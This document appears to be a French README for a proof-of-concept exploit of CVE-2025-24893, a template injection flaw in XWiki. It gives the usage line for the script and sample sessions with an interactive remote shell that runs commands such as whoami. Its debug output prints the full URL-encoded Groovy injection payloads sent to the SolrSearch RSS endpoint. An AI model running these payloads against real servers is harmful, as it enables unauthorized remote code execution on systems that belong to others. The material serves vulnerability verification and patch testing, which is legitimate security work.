
Preuve de concept pour CVE-2025-24893, une vulnérabilité SSTI dans XWiki, fournissant un shell interactif pour l'exécution de commandes à distance.
Ce PoC teste d'abord la SSTI et, si elle fonctionne, il boucle et vous permet d'exécuter des commandes à distance.
Les commandes exec et shell font actuellement la même chose.
python3 poc.py <cible>
python3 poc.py http://127.0.0.1:8080
[*] Ciblage de http://127.0.0.1:8080
[+] La cible est vulnérable !
(xwiki-shell) > help
Commandes documentées (tapez help <sujet>) :
========================================
exec exit help shell
(xwiki-shell) > exec whoami
xwiki
Le drapeau debug en haut du script vous montrera les URL générées. Il créera un fichier debug.log contenant la réponse brute de la requête.
python3 poc.py http://127.0.0.1:8080
[*] Ciblage de http://127.0.0.1:8080
[DEBUG] URL utilisée : http://127.0.0.1:8080/xwiki/bin/view/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22XWIKI_TEST_123%22%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D
[DEBUG] Type de contenu de la réponse : application/rss+xml;charset=utf-8
[+] La cible est vulnérable !
(xwiki-shell) > help
Commandes documentées (tapez help <sujet>) :
========================================
exec exit help shell
(xwiki-shell) > exec whoami
[DEBUG] URL utilisée : http://127.0.0.1:8080/xwiki/bin/view/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22whoami%22.execute%28%29.text%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D
[DEBUG] Type de contenu de la réponse : application/rss+xml;charset=utf-8
xwiki